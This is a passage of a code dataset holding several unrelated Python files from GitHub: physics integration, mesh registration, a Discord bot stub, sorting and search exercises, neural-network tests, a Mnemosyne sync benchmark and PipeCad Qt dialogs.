labels.append(birth_header[5])\n #labels.append(\"avg_a\")\n plts.append(plt.plot([i for i in range(0, len(data))], [0 for i in range(0, len(data))], linewidth=1, color=\"black\"))\n #plts.append(plt.plot([i for i in range(0, len(data))], avg_arr, linewidth=0.5, color=\"purple\"))\n #plts.append(plt.plot([i for i in range(0, len(data))], avg_arr2, linewidth=0.5, color=\"red\"))\n plt.legend(handles=plts, labels=labels)\n if save_png_name is not None:\n plt.savefig(save_png_name)\n plt.show()\n '''if save_png_name is not None:\n plt.savefig(save_png_name)'''\n\n#birth_data = [[float(x) for x in row] for row in birth_data] # 将数据从string形式转换为float形式\nvel = []\ny = []\nx = []\nfor j in range(0, len(birth_data)):\n x = [birth_data[i][0] for i in range(0, j)]\n y = [birth_data[i][2] for i in range(0, j)]\n v = integrate.trapz(y, x)\n vel.append(v)\n birth_data[j].append(v)\n # print(v)\n\n# y = [birth_data[i][3] for i in range(0, len(birth_data))]\npos = []\nfor j in range(0, len(birth_data)):\n x = [birth_data[i][0] for i in range(0, j)]\n y = [vel[i] for i in range(0, j)]\n pos = integrate.trapz(y, x)\n vel.append(v)\n birth_data[j].append(pos)\n\nprint(str(pos*100) + \"cm\")\nshow_graph(birth_data,\"asas\", init_colors())\n","repo_name":"Wyh199697/local-test","sub_path":"fsensor.py","file_name":"fsensor.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41891010025","text":"\"\"\"\nSheared bunny\n=============\n\n3D meshes registration using implicit modules of order 1. Normal frames and growth factor are optimized.\n\"\"\"\n\n###############################################################################\n# Important relevant Python modules.\n#\n\nimport sys\nsys.path.append(\"../\")\n\nimport torch\nimport meshio\n\n\nimport imodal\n\ntorch.set_default_dtype(torch.float64)\nimodal.Utilities.set_compute_backend('keops')\ndevice = 'cuda:2'\n# device = 'cpu'\n\n###############################################################################\n# Load source and target data.\n#\n\ndata_folder = \"../data/\"\nsource_mesh = meshio.read(data_folder+\"bunny.ply\")\ntarget_mesh = meshio.read(data_folder+\"bunny_shear.ply\")\n\nsource_points = torch.tensor(source_mesh.points, dtype=torch.get_default_dtype())\ntarget_points = torch.tensor(target_mesh.points, dtype=torch.get_default_dtype())\nsource_triangles = torch.tensor(source_mesh.cells_dict['triangle'], dtype=torch.long)\ntarget_triangles = torch.tensor(target_mesh.cells_dict['triangle'], dtype=torch.long)\n\n\n###############################################################################\n# Rescaling source and target.\n#\n\nscale_factor = 100.\nsource_points = scale_factor*(source_points - torch.mean(source_points, dim=0))\ntarget_points = scale_factor*(target_points - torch.mean(target_points, dim=0))\n\n\n###############################################################################\n# Generation of implicit module of order 1: points positions, initial growth\n# factor and normal frames.\n#\n\n# Defining an AABB around the source\naabb_source = imodal.Utilities.AABB.build_from_points(1.8*source_points)\n\n# Generation of growth points\nimplicit1_density = 0.1\nimplicit1_points = imodal.Utilities.fill_area_uniform_density(imodal.Utilities.area_convex_hull, aabb_source, implicit1_density, scatter=1.8*source_points)\n\n# Placeholders for growth factor and normal frames\nimplicit1_r = torch.empty(implicit1_points.shape[0], 3, 3)\nimplicit1_c = torch.empty(implicit1_points.shape[0], 3, 1)\n\n# Initial growth factor constants\ngrowth_constants = torch.tensor([[[1.], [1.], [1.]]], requires_grad=True, device=device)\n\n# Initial normal frames angles. Normal frames are rotation matrices and thus defined by 3 angles.\nangles = torch.zeros(implicit1_points.shape[0], 3, requires_grad=True, device=device)\n\n\n###############################################################################\n# Create the deformation model with a combination of 3 modules : implicit module\n# of order 1 (growth model), implicit module of order 0 (small corrections), global translation\n# and a large scale rotation.\n#\n\n\n###############################################################################\n# Create and initialize the global translation module.\n#\n\nglobal_translation = imodal.DeformationModules.GlobalTranslation(3, coeff=10.)\n\n\n###############################################################################\n# Create and initialize the growth module.\n#\n\nsigma1 = 2.5/implicit1_density**(1/3)\n\nimplicit1 = imodal.DeformationModules.ImplicitModule1(3, implicit1_points.shape[0], sigma1, implicit1_c, nu=1000., gd=(implicit1_points, implicit1_r), coeff=0.001)\n\nprint(\"{} points for the implicit module of order 1.\".format(implicit1_points.shape[0]))\n\n\n###############################################################################\n# Create and initialize the local translations module.\n#\n\nimplicit0_density = 0.25\nsigma0 = 2./implicit0_density**(1/3)\n\nprint(sigma0)\n\nimplicit0_points = imodal.Utilities.fill_area_uniform_density(imodal.Utilities.area_convex_hull, aabb_source, implicit0_density, scatter=1.8*source_points)\n\nimplicit0 = imodal.DeformationModules.ImplicitModule0(3, implicit0_points.shape[0], sigma0, nu=1., gd=implicit0_points, coeff=1000.)\n\nprint(\"{} points for the implicit module of order 0.\".format(implicit0_points.shape[0]))\n\n\n###############################################################################\n# Create and initialize the local large scale rotation.\n#\n\nrotation = imodal.DeformationModules.LocalRotation(3, 30., gd=torch.tensor([[0., 0., 0.], [0., 0., 1.]], device=device, requires_grad=True), backend='torch', coeff=10.)\n\n\n###############################################################################\n# Define our growth factor model.\n#\n\n# Function that computes normal frames from angles.\ndef compute_basis(angles):\n rot_x = imodal.Utilities.rot3d_x_vec(angles[:, 0])\n rot_y = imodal.Utilities.rot3d_y_vec(angles[:, 1])\n rot_z = imodal.Utilities.rot3d_z_vec(angles[:, 2])\n return torch.einsum('nik, nkl, nlj->nij', rot_z, rot_y, rot_x)\n\n\n# Function that computes growth factor from growth factor constants.\ndef compute_growth(growth_constants):\n return growth_constants.repeat(implicit1_points.shape[0], 1, 1)\n\n\n# Callback used by the registration model to compute the new growth factor\n# and normal frames.\ndef precompute(init_manifold, modules, parameters, _):\n init_manifold[1].gd = (init_manifold[1].gd[0], compute_basis(parameters['growth']['params'][0]))\n modules[1].C = compute_growth(parameters['growth']['params'][1])\n\n\n###############################################################################\n# Define deformables used by the registration model.\n#\n\ndeformable_source = imodal.Models.DeformableMesh(source_points, source_triangles)\ndeformable_target = imodal.Models.DeformableMesh(target_points, target_triangles)\n\ndeformable_source.to_device(device)\ndeformable_target.to_device(device)\n\n###############################################################################\n# Define the registration model.\n#\n\nsigmas_varifold = [1., 5., 15.]\nattachment = imodal.Attachment.VarifoldAttachment(3, sigmas_varifold)\n\nmodel = imodal.Models.RegistrationModel(deformable_source, [implicit1, implicit0, global_translation, rotation], [attachment], fit_gd=None, lam=100., precompute_callback=precompute, other_parameters={'growth': {'params': [angles, growth_constants]}})\nmodel.to_device(device)\n\n###############################################################################\n# Fitting using Torch LBFGS optimizer.\n#\n\nshoot_solver = 'euler'\nshoot_it = 10\ncosts = {}\nfitter = imodal.Models.Fitter(model, optimizer='torch_lbfgs')\n\nfitter.fit(deformable_target, 500, costs=costs, options={'shoot_solver': shoot_solver, 'shoot_it': shoot_it, 'line_search_fn': 'strong_wolfe', 'history_size': 500})\n\n\n###############################################################################\n# Compute optimized deformation trajectory.\n#\n\nimport time\nintermediates = {}\nstart = time.perf_counter()\nwith torch.autograd.no_grad():\n deformed = model.compute_deformed(shoot_solver, shoot_it, intermediates=intermediates)[0][0].detach()\nprint(\"Elapsed={elapsed}\".format(elapsed=time.perf_counter()-start))\n\nbasis = compute_basis(angles.detach()).cpu()\nC = compute_growth(growth_constants.detach()).cpu()\nprint(growth_constants.detach().cpu())\n\nimodal.Utilities.export_mesh(\"results_implicit_bunny/source.ply\", source_points.cpu(), source_triangles)\nimodal.Utilities.export_mesh(\"results_implicit_bunny/target.ply\", target_points.cpu(), target_triangles)\nimodal.Utilities.export_implicit1_growth(\"results_implicit_bunny/growth.vtk\", implicit1_points, C)\nimodal.Utilities.export_point_basis(\"results_implicit_bunny/basis.vtk\", implicit1_points, basis)\nimodal.Utilities.export_mesh_points(\"results_implicit_bunny/implicit0_points.vtk\", implicit0_points)\n\nfor i, inter in enumerate(intermediates['states']):\n imodal.Utilities.export_mesh(\"results_implicit_bunny/{}.ply\".format(i), inter[0].gd.cpu(), source_triangles)\n\nwith open(\"results_implicit_bunny/model.txt\", 'w') as f:\n f.write(str(model))\n\nwith open(\"results_implicit_bunny/intermediates.pt\", 'wb') as f:\n torch.save(intermediates, f)\n\n","repo_name":"imodal/imodal","sub_path":"examples/plot_sheared_bunny.py","file_name":"plot_sheared_bunny.py","file_ext":"py","file_size_in_byte":7758,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"18821976125","text":"from bot_token import TOKEN\nimport discord\nimport asyncio\n\n\nclient = discord.Client()\n\n\n@client.event\nasync def on_ready():\n print(f\"{client.user} подключен!\")\n for guild in client.guilds:\n print(\n f\"{client.user} подключен к чату:\\n\"\n f\"{guild.name}(id: {guild.id})\"\n )\n\n\nclient.run(TOKEN)\n","repo_name":"BearForesterSmallBeef/DiscordBot","sub_path":"bot-1-main.py","file_name":"bot-1-main.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35663415145","text":"def selectionsrot(a):\n for i in range(len(a) - 1):\n min = i\n for j in range(i+1, range(len(a))):\n if a[min] > a[j]:\n min = j\n a[i], a[min] = a[min], a[i]\n\n\n\ndata = [64, 25, 10, 22, 11]\nselectionsrot(data)\nprint(data)\n\n","repo_name":"gogumasitda/TIL","sub_path":"algorithm/01.21/선택정렬.py","file_name":"선택정렬.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"73032901173","text":"import numpy as np\n\nfrom neupy import algorithms\n\nfrom base import BaseTestCase\n\n\ndata = np.array([\n [0.11, 0.20],\n [0.25, 0.32],\n [0.64, 0.60],\n [0.12, 0.42],\n [0.70, 0.73],\n [0.30, 0.27],\n [0.43, 0.81],\n [0.44, 0.87],\n [0.12, 0.92],\n [0.56, 0.67],\n [0.36, 0.35],\n])\n\n\nclass RBFKMeansTestCase(BaseTestCase):\n def test_rbfk_exceptions(self):\n with self.assertRaises(ValueError):\n # More clusters than samples\n nw = algorithms.RBFKMeans(n_clusters=1000, verbose=False)\n nw.train(data, epsilon=1e-5)\n\n with self.assertRaises(ValueError):\n # Number of clusters the same as number of samples\n nw = algorithms.RBFKMeans(n_clusters=data.shape[0],\n verbose=False)\n nw.train(data, epsilon=1e-5)\n\n with self.assertRaises(ValueError):\n # One cluster\n nw = algorithms.RBFKMeans(n_clusters=1, verbose=False)\n nw.train(data, epsilon=1e-5)\n\n def test_rbfk_classification(self):\n expected_centers = np.array([\n [0.228, 0.312],\n [0.482, 0.767],\n ])\n\n nw = algorithms.RBFKMeans(n_clusters=2, verbose=False)\n nw.train(data, epsilon=1e-5)\n np.testing.assert_array_almost_equal(expected_centers, nw.centers,\n decimal=3)\n\n def test_rbfk_train_different_inputs(self):\n self.assertInvalidVectorTrain(\n algorithms.RBFKMeans(n_clusters=2, verbose=False),\n np.array([1, 2, 10]),\n )\n\n def test_rbfk_predict_different_inputs(self):\n kmnet = algorithms.RBFKMeans(verbose=False, n_clusters=2)\n\n data = np.array([[1, 2, 10]]).T\n target = np.array([[0, 0, 1]]).T\n\n kmnet.train(data)\n self.assertInvalidVectorPred(kmnet, data.ravel(), target, decimal=2)\n\n def test_rbfk_means_assign_step_exception(self):\n with self.assertRaises(ValueError):\n algorithms.RBFKMeans(n_cluster=2, step=0.01)\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/itdxer_neupy/neupy-master/tests/algorithms/rbfn/test_rbf_kmeans.py","file_name":"test_rbf_kmeans.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"2021755979","text":"#!/usr/bin/env python\r\n\r\nimport os\r\nimport time\r\nimport pstats\r\nimport shutil\r\nimport cProfile\r\n\r\nfrom mnemosyne.libmnemosyne import Mnemosyne\r\n\r\nnumber_of_calls = 50 # Number of calls to display in profile\r\nnumber_of_facts = 6000\r\n\r\nfrom openSM2sync.server import Server\r\nfrom openSM2sync.client import Client\r\nfrom openSM2sync.log_entry import EventTypes\r\n\r\nfrom mnemosyne.libmnemosyne import Mnemosyne\r\nfrom mnemosyne.libmnemosyne.fact import Fact\r\nfrom mnemosyne.libmnemosyne.ui_components.main_widget import MainWidget\r\nfrom mnemosyne.libmnemosyne.ui_components.review_widget import ReviewWidget\r\n\r\nclass Widget(MainWidget):\r\n\r\n def set_progress_text(self, text):\r\n print(text)\r\n\r\n def show_information(self, info):\r\n print(info)\r\n\r\n def show_error(self, error):\r\n print(error)\r\n\r\nclass MyReviewWidget(ReviewWidget):\r\n\r\n def redraw_now(self):\r\n pass\r\n\r\n\r\nclass MyClient(Client):\r\n\r\n program_name = \"Mnemosyne\"\r\n program_version = \"test\"\r\n capabilities = \"TODO\"\r\n\r\n def __init__(self):\r\n shutil.rmtree(os.path.abspath(\"dot_sync_client\"), ignore_errors=True)\r\n self.mnemosyne = Mnemosyne(upload_science_logs=False, interested_in_old_reps=True)\r\n self.mnemosyne.components = [\r\n (\"mnemosyne.libmnemosyne.gui_translator\",\r\n \"NoGuiTranslation\"),\r\n (\"mnemosyne.libmnemosyne.databases.SQLite\",\r\n \"SQLite\"),\r\n (\"mnemosyne.libmnemosyne.configuration\",\r\n \"Configuration\"),\r\n (\"mnemosyne.libmnemosyne.loggers.database_logger\",\r\n \"DatabaseLogger\"),\r\n (\"mnemosyne.libmnemosyne.schedulers.SM2_mnemosyne\",\r\n \"SM2Mnemosyne\"),\r\n (\"mnemosyne.libmnemosyne.stopwatch\",\r\n \"Stopwatch\"),\r\n (\"mnemosyne.libmnemosyne.card_types.front_to_back\",\r\n \"FrontToBack\"),\r\n (\"mnemosyne.libmnemosyne.card_types.both_ways\",\r\n \"BothWays\"),\r\n (\"mnemosyne.libmnemosyne.card_types.vocabulary\",\r\n \"Vocabulary\"),\r\n (\"mnemosyne.libmnemosyne.renderers.html_css\",\r\n \"HtmlCss\"),\r\n (\"mnemosyne.libmnemosyne.filters.escape_to_html\",\r\n \"EscapeToHtml\"),\r\n (\"mnemosyne.libmnemosyne.filters.expand_paths\",\r\n \"ExpandPaths\"),\r\n (\"mnemosyne.libmnemosyne.filters.latex\",\r\n \"Latex\"),\r\n (\"mnemosyne.libmnemosyne.render_chains.default_render_chain\",\r\n \"DefaultRenderChain\"),\r\n (\"mnemosyne.libmnemosyne.render_chains.plain_text_chain\",\r\n \"PlainTextChain\"),\r\n (\"mnemosyne.libmnemosyne.controllers.default_controller\",\r\n \"DefaultController\"),\r\n (\"mnemosyne.libmnemosyne.review_controllers.SM2_controller\",\r\n \"SM2Controller\"),\r\n (\"mnemosyne.libmnemosyne.card_types.map\",\r\n \"MapPlugin\"),\r\n (\"mnemosyne.libmnemosyne.card_types.cloze\",\r\n \"ClozePlugin\"),\r\n (\"mnemosyne.libmnemosyne.criteria.default_criterion\",\r\n \"DefaultCriterion\"),\r\n (\"mnemosyne.libmnemosyne.databases.SQLite_criterion_applier\",\r\n \"DefaultCriterionApplier\"),\r\n (\"mnemosyne.libmnemosyne.plugins.cramming_plugin\",\r\n \"CrammingPlugin\") ]\r\n self.mnemosyne.components.append((\"benchmark_sync_client\", \"Widget\"))\r\n self.mnemosyne.components.append((\"benchmark_sync_client\", \"MyReviewWidget\"))\r\n self.mnemosyne.initialise(os.path.abspath(os.path.join(os.getcwd(),\r\n \"dot_sync_client\")), automatic_upgrades=False)\r\n self.mnemosyne.config().change_user_id(\"user_id\")\r\n self.check_for_edited_local_media_files = False\r\n self.do_backup = False\r\n self.mnemosyne.review_controller().reset()\r\n # Do 200 reviews.\r\n card_type = self.mnemosyne.card_type_with_id(\"1\")\r\n fact_data = {\"f\": \"question\",\r\n \"b\": \"answer\"}\r\n card = self.mnemosyne.controller().create_new_cards(fact_data, card_type,\r\n grade=-1, tag_names=[\"default\"])[0]\r\n self.mnemosyne.database().save()\r\n self.mnemosyne.review_controller().show_new_question()\r\n for i in range(200):\r\n self.mnemosyne.review_controller().show_answer()\r\n self.mnemosyne.review_controller().grade_answer(0)\r\n Client.__init__(self, \"client_machine_id\", self.mnemosyne.database(),\r\n self.mnemosyne.main_widget())\r\n\r\n def do_sync(self):\r\n #self.BUFFER_SIZE = 10*8192\r\n #self.behind_proxy = True\r\n self.sync(\"localhost\", 8186, \"user\", \"pass\")\r\n self.mnemosyne.database().save()\r\n\r\nif __name__== '__main__':\r\n\r\n client = MyClient()\r\n\r\n def sync():\r\n client.do_sync()\r\n\r\n tests = [\"sync()\"]\r\n\r\n for test in tests:\r\n cProfile.run(test, \"mnemosyne_profile.\" + test.replace(\"()\", \"\"))\r\n print()\r\n print((\"*** \", test, \" ***\"))\r\n print()\r\n p = pstats.Stats('mnemosyne_profile.' + test.replace(\"()\", \"\"))\r\n p.strip_dirs().sort_stats('cumulative').print_stats(number_of_calls)\r\n","repo_name":"mnemosyne-proj/mnemosyne","sub_path":"tests/benchmark_sync_client.py","file_name":"benchmark_sync_client.py","file_ext":"py","file_size_in_byte":5185,"program_lang":"python","lang":"en","doc_type":"code","stars":443,"dataset":"github-code","pt":"21"} +{"seq_id":"27841976443","text":"# 34\n# Given arry of int nums sorted in ascending order, find starting and ending position of given target value.\n\nfrom typing import List, Tuple\n\n\ndef brute_force_soln(nums: List[int], target: int) -> List[int]:\n left = 0\n right = len(nums) - 1\n low = -1\n high = -1\n while left <= right:\n mid = (left + right) // 2\n val = nums[mid]\n if val == target:\n ileft = mid - 1\n iright = mid + 1\n low = mid\n high = mid\n while ileft >= 0:\n if nums[ileft] == target:\n low = ileft\n ileft -= 1\n else:\n break\n while iright < len(nums):\n if nums[iright] == target:\n high = iright\n iright += 1\n else:\n break\n return [low, high]\n if val < target:\n left = mid + 1\n else:\n right = mid - 1\n return [low, high]\n\n\ninput1 = [5, 7, 7, 8, 8, 10]\ntarget1 = 8 # [3, 4]\ninput2 = [5, 7, 7, 8, 8, 10]\ntarget2 = 6 # [-1, -1]\ninput3 = []\ntarget3 = 0 # [-1, -1]\ninput4 = [1, 3, 3, 5, 5, 5, 8, 9]\ntarget4 = 5 # [3, 5]\ninput5 = [1, 2, 3, 4, 5, 6]\ntarget5 = 4 # [3, 3]\ninput6 = [1]\ntarget6 = 1 # [0, 0]\n\n\nprint(brute_force_soln(input1, target1))\nprint(brute_force_soln(input2, target2))\nprint(brute_force_soln(input3, target3))\nprint(brute_force_soln(input4, target4))\nprint(brute_force_soln(input5, target5))\n\n\ndef soln(nums: List[int], target: int) -> List[int]:\n def binary_search(nums: List[int], target: int) -> Tuple[bool, int]:\n left = 0\n right = len(nums) - 1\n while left <= right:\n mid = (left + right) // 2\n val = nums[mid]\n if val == target:\n return True, mid\n elif val < target:\n left = mid + 1\n else:\n right = mid - 1\n return False, -1\n\n low = -1\n high = -1\n found, first_found = binary_search(nums, target)\n if found:\n low = first_found\n high = first_found\n while low >= 0:\n left_found, left = binary_search(nums[:low], target)\n if not left_found:\n break\n low = left\n while high < len(nums):\n right_found, right = binary_search(nums[high + 1:], target)\n if not right_found:\n break\n high = (right + high + 1)\n\n return [low, high]\n\n\nprint(soln(input1, target1))\nprint(soln(input2, target2))\nprint(soln(input3, target3))\nprint(soln(input4, target4))\nprint(soln(input5, target5))\nprint(soln(input6, target6))\n\n\ndef soln2(nums: List[int], target: int) -> List[int]:\n def binary_search(nums: List[int], left: int, right: int, target: int) -> int:\n while left <= right:\n mid = (left + right) // 2\n val = nums[mid]\n if val == target:\n return mid\n elif val < target:\n left = mid + 1\n else:\n right = mid - 1\n return -1\n\n if len(nums) == 0:\n return [-1, -1]\n first_pos = binary_search(nums, 0, len(nums) - 1, target)\n if first_pos == -1:\n return [-1, -1]\n start_pos = first_pos\n end_pos = first_pos\n while start_pos != -1:\n temp1 = start_pos\n start_pos = binary_search(nums, 0, start_pos - 1, target)\n start_pos = temp1\n while end_pos != -1:\n temp2 = end_pos\n end_pos = binary_search(nums, end_pos + 1, len(nums) - 1, target)\n end_pos = temp2\n return [start_pos, end_pos]\n\n\nprint(soln2(input1, target1))\nprint(soln2(input2, target2))\nprint(soln2(input3, target3))\nprint(soln2(input4, target4))\nprint(soln2(input5, target5))\nprint(soln2(input6, target6))\n","repo_name":"raymondng76/Python-Playground","sub_path":"Udemy_Master_Coding_Interview/Q14_Start_And_End_Of_Target_In_A_Sorted_Array.py","file_name":"Q14_Start_And_End_Of_Target_In_A_Sorted_Array.py","file_ext":"py","file_size_in_byte":3812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5116506743","text":"from PythonQt.QtCore import *\nfrom PythonQt.QtGui import *\nfrom PythonQt.QtSql import *\n\nfrom pipecad import *\n\n\nclass CreateDialog(QDialog):\n def __init__(self, parent = None):\n QDialog.__init__(self, parent)\n \n self.setupUi()\n # __init__\n\n def setupUi(self):\n self.resize(280, 100)\n self.setWindowTitle(QT_TRANSLATE_NOOP(\"Paragon\", \"Create Coco Table\"))\n\n self.verticalLayout = QVBoxLayout(self)\n self.formLayout = QFormLayout()\n\n # Name\n self.labelName = QLabel(\"Name\")\n self.textName = QLineEdit()\n\n self.formLayout.setWidget(0, QFormLayout.LabelRole, self.labelName)\n self.formLayout.setWidget(0, QFormLayout.FieldRole, self.textName)\n\n # Purpose\n self.labelPurpose = QLabel(\"Purpose\")\n self.comboPurpose = QComboBox()\n self.comboPurpose.setEditable(True)\n self.comboPurpose.addItem(\"PIPE\")\n self.comboPurpose.addItem(\"STL\")\n self.comboPurpose.addItem(\"NOZZ\")\n self.comboPurpose.addItem(\"EQUI\")\n\n self.formLayout.setWidget(1, QFormLayout.LabelRole, self.labelPurpose)\n self.formLayout.setWidget(1, QFormLayout.FieldRole, self.comboPurpose)\n\n self.verticalLayout.addLayout(self.formLayout)\n\n self.buttonBox = QDialogButtonBox()\n self.buttonBox.setStandardButtons(QDialogButtonBox.Cancel|QDialogButtonBox.Ok)\n\n self.buttonBox.accepted.connect(self.accept)\n self.buttonBox.rejected.connect(self.reject)\n\n self.verticalLayout.addWidget(self.buttonBox)\n # setupUi\n\n def accept(self):\n\n aName = self.textName.text\n aPurpose = self.comboPurpose.currentText\n\n try:\n PipeCad.StartTransaction(\"Create Coco Table\")\n\n PipeCad.CreateItem(\"CCTA\", aName)\n aCctaItem = PipeCad.CurrentItem()\n aCctaItem.Purpose = aPurpose\n\n PipeCad.CommitTransaction()\n except Exception as e:\n QMessageBox.critical(self, \"\", e)\n raise e\n # try\n\n QDialog.accept(self)\n # accept\n# CreateDialog\n\n# Singleton Instance.\naCreateDlg = CreateDialog(PipeCad)\n\ndef Create():\n aCreateDlg.show()\n# Create\n\n\nclass ComboBoxDelegate(QItemDelegate):\n def __init__(self, parent = None):\n QItemDelegate.__init__(self, parent)\n # __init__\n\n def setupCoco(self, theCctaItem):\n self.cocoTypes = []\n if theCctaItem is None:\n return\n # if\n\n aCcdeList = PipeCad.CollectItem(\"CCDE\", theCctaItem)\n for aCcdeItem in aCcdeList:\n self.cocoTypes.append(aCcdeItem.Connection)\n # for\n # setupCoco\n\n def createEditor(self, theParent, theOption, theIndex):\n anEditor = QComboBox(theParent)\n #anEditor.setEditable(True)\n anEditor.addItems(self.cocoTypes)\n return anEditor\n # createEditor\n\n def setEditorData(self, theEditor, theIndex):\n aText = theIndex.data()\n if aText is not None:\n theEditor.setCurrentText(aText)\n # if\n # setEditorData\n\n def setModelData(self, theEditor, theModel, theIndex):\n theModel.setData(theIndex, theEditor.currentText)\n # setModelData\n\n# ComboBoxDelegate\n\nclass CocdesDialog(QDialog):\n def __init__(self, parent = None):\n QDialog.__init__(self, parent)\n \n self.setupUi()\n # __init__\n\n def setupUi(self):\n self.resize(380, 500)\n self.setWindowTitle(QT_TRANSLATE_NOOP(\"Paragon\", \"COCO Description\"))\n\n self.verticalLayout = QVBoxLayout(self)\n\n self.tableWidget = QTableWidget(18, 2)\n self.tableWidget.setHorizontalHeaderLabels([\"Name\", \"Description\"])\n self.tableWidget.setAlternatingRowColors(True)\n self.tableWidget.horizontalHeader().setDefaultSectionSize(60)\n self.tableWidget.verticalHeader().setDefaultSectionSize(18)\n self.tableWidget.horizontalHeader().setStretchLastSection(True)\n\n self.verticalLayout.addWidget(self.tableWidget)\n\n self.horizontalLayout = QHBoxLayout()\n\n self.buttonAdd = QPushButton(\"Add\")\n self.buttonAdd.clicked.connect(self.addRow)\n\n self.buttonDelete = QPushButton(\"Delete\")\n self.buttonDelete.clicked.connect(self.deleteRow)\n\n # Spacer Item.\n aSpacerItem = QSpacerItem(40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)\n \n # Dialog Buttons.\n self.buttonBox = QDialogButtonBox()\n self.buttonBox.setStandardButtons(QDialogButtonBox.Cancel|QDialogButtonBox.Ok)\n\n self.buttonBox.accepted.connect(self.accept)\n self.buttonBox.rejected.connect(self.reject)\n\n self.horizontalLayout.addWidget(self.buttonAdd)\n self.horizontalLayout.addWidget(self.buttonDelete)\n self.horizontalLayout.addItem(aSpacerItem)\n self.horizontalLayout.addWidget(self.buttonBox)\n\n self.verticalLayout.addLayout(self.horizontalLayout)\n # setupUi\n\n def fillForm(self, theCctaItem):\n if theCctaItem is None:\n return\n # if\n\n aCcdeList = PipeCad.CollectItem(\"CCDE\", theCctaItem)\n self.tableWidget.setRowCount(len(aCcdeList) + 1)\n for i in range (len(aCcdeList)):\n aCcdeItem = aCcdeList[i]\n self.tableWidget.setItem(i, 0, QTableWidgetItem(aCcdeItem.Connection))\n self.tableWidget.setItem(i, 1, QTableWidgetItem(aCcdeItem.Description))\n # for\n # fillForm\n\n def addRow(self):\n aRow = self.tableWidget.rowCount\n self.tableWidget.insertRow(aRow)\n # addRow\n\n def deleteRow(self):\n aAnswer = QMessageBox.question(self, \"\", \"Are you sure to delete the selected row?\")\n if aAnswer != QMessageBox.Yes:\n return\n # if\n\n aRows = []\n for aItem in self.tableWidget.selectedItems():\n aRows.append(aItem.row())\n # for\n\n # Remove duplicate row.\n aRows = list(set(aRows))\n if len(aRows) < 1:\n return\n # if\n\n aRows.sort(reverse=True)\n for r in aRows:\n self.tableWidget.removeRow(r)\n # for\n # deleteRow\n\n# CocdesDialog\n\nclass ModifyDialog(QDialog):\n def __init__(self, parent = None):\n QDialog.__init__(self, parent)\n self.cocoTable = None\n self.setupUi()\n # __init__\n\n def setupUi(self):\n self.resize(580, 360)\n self.setWindowTitle(QT_TRANSLATE_NOOP(\"Paragon\", \"Modify COCO Table\"))\n\n self.verticalLayout = QVBoxLayout(self)\n self.formLayout = QFormLayout()\n\n # Name\n self.buttonCE = QPushButton(\"CE\")\n self.labelName = QLabel(\"\")\n\n self.buttonCE.clicked.connect(self.setCocoTable)\n\n self.formLayout.setWidget(0, QFormLayout.LabelRole, self.buttonCE)\n self.formLayout.setWidget(0, QFormLayout.FieldRole, self.labelName)\n self.verticalLayout.addLayout(self.formLayout)\n\n # Actions.\n self.horizontalLayout = QHBoxLayout()\n self.buttonCcde = QPushButton(\"COCO Description\")\n self.buttonAddRow = QPushButton(\"Add Row\")\n self.buttonDelRow = QPushButton(\"Delete Row\")\n self.buttonAddColumn = QPushButton(\"Add Column\")\n self.buttonDelColumn = QPushButton(\"Delete Column\")\n\n self.buttonCcde.clicked.connect(self.setupTypes)\n self.buttonAddRow.clicked.connect(self.addRow)\n self.buttonDelRow.clicked.connect(self.deleteRow)\n self.buttonAddColumn.clicked.connect(self.addColumn)\n self.buttonDelColumn.clicked.connect(self.deleteColumn)\n\n self.horizontalLayout.addWidget(self.buttonCcde)\n self.horizontalLayout.addWidget(self.buttonAddRow)\n self.horizontalLayout.addWidget(self.buttonDelRow)\n self.horizontalLayout.addWidget(self.buttonAddColumn)\n self.horizontalLayout.addWidget(self.buttonDelColumn)\n\n self.verticalLayout.addLayout(self.horizontalLayout)\n\n # COCO Table.\n self.tableWidget = QTableWidget(3, 4)\n self.tableWidget.setHorizontalHeaderLabels([\"CType\"])\n self.tableWidget.setAlternatingRowColors(True)\n self.tableWidget.horizontalHeader().setDefaultSectionSize(60)\n self.tableWidget.verticalHeader().setDefaultSectionSize(18)\n #self.tableWidget.horizontalHeader().setStretchLastSection(True)\n\n # Delegate.\n self.comboBoxDelegate = ComboBoxDelegate(self.tableWidget)\n self.tableWidget.setItemDelegate(self.comboBoxDelegate)\n\n self.verticalLayout.addWidget(self.tableWidget)\n\n # Dialog Buttons.\n self.buttonBox = QDialogButtonBox()\n self.buttonBox.setStandardButtons(QDialogButtonBox.Cancel|QDialogButtonBox.Ok)\n\n self.buttonBox.accepted.connect(self.accept)\n self.buttonBox.rejected.connect(self.reject)\n\n self.verticalLayout.addWidget(self.buttonBox)\n # setupUi\n\n def setCocoTable(self):\n aItem = PipeCad.CurrentItem()\n if aItem.Type == \"CCTA\":\n self.cocoTable = aItem\n self.labelName.setText(aItem.Name)\n self.comboBoxDelegate.setupCoco(aItem)\n else:\n QMessageBox.warning(self, \"\", \"Please select CCTA!\")\n # if\n # setCocoTable\n\n def setupTypes(self):\n aDlg = CocdesDialog(self)\n aDlg.fillForm(self.cocoTable)\n if aDlg.exec() == QDialog.Rejected:\n return\n # if\n\n if self.cocoTable is None:\n QMessageBox.warning(self, \"\", \"Please set CCTA first!\")\n return\n # if\n\n aMemberList = self.cocoTable.Member\n if len(aMemberList) > 0:\n PipeCad.SetCurrentItem(aMemberList[-1])\n else:\n PipeCad.SetCurrentItem(self.cocoTable)\n # if\n\n PipeCad.StartTransaction(\"Set COCO Description\")\n aRowCount = aDlg.tableWidget.rowCount\n for r in range (aRowCount):\n aNameItem = aDlg.tableWidget.item(r, 0)\n aDescItem = aDlg.tableWidget.item(r, 1)\n if aNameItem is not None and len(aNameItem.text()) > 0:\n try:\n PipeCad.CreateItem(\"CCDE\", aNameItem.text() + 